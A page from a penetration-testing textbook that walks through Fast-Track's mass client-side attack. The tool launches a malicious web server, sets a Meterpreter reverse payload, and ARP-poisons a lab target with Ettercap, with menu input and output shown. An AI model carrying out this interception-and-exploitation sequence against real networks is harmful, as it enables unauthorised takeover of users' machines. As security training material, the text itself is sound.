Fast-Track
175
Mass Client-Side Attack
The
mass client-side attack
is similar to the
Browser Autopwn
function; however,
this attack includes additional exploits and built-in features that can incorpo-
rate ARP cache and DNS poisoning on the target’s machine, and additional
browser exploits not included in Metasploit.
When a user connects to your web server, Fast-Track will fire off every
exploit in its arsenal as well as those in the Metasploit Framework. If the
user’s machine is susceptible to a specific vulnerability within one of these
libraries, the attacker will obtain full access to the target machine.
Enter the number:
4
. . . SNIP . . .
Enter the IP Address you want the web server to listen on:
10.211.55.130
Specify your payload:
1. Windows Meterpreter Reverse Meterpreter
2. Generic Bind Shell
3. Windows VNC Inject Reverse_TCP (aka "Da Gui")
4. Reverse TCP Shell
Enter the number of the payload you want:
1
After selecting option 4,
Mass Client-Side Attack
, from the main menu,
tell Fast-Track what IP address the web server should listen on , and then
choose a payload .
Next, decide whether to use Ettercap to ARP-poison your target machine.
Ettercap will intercept all requests that the target makes and redirect them to
your malicious server. After confirming that you want to use Ettercap at ,
enter the IP address of the target you want to poison . Fast-Track will then
go ahead and set up Ettercap for you.
Would you like to use Ettercap to ARP poison a host yes or no:
yes
. . . SNIP . . .
What IP Address do you want to poison:
10.211.55.128
Setting up the ettercap filters....
Filter created...
Compiling Ettercap filter...
. . . SNIP . . .
Filter compiled...Running Ettercap and poisoning target...
Once a client connects to your malicious server, Metasploit fires exploits
at the target. In the following listing, you can see that the Adobe exploit is
successful, and a Meterpreter shell is waiting .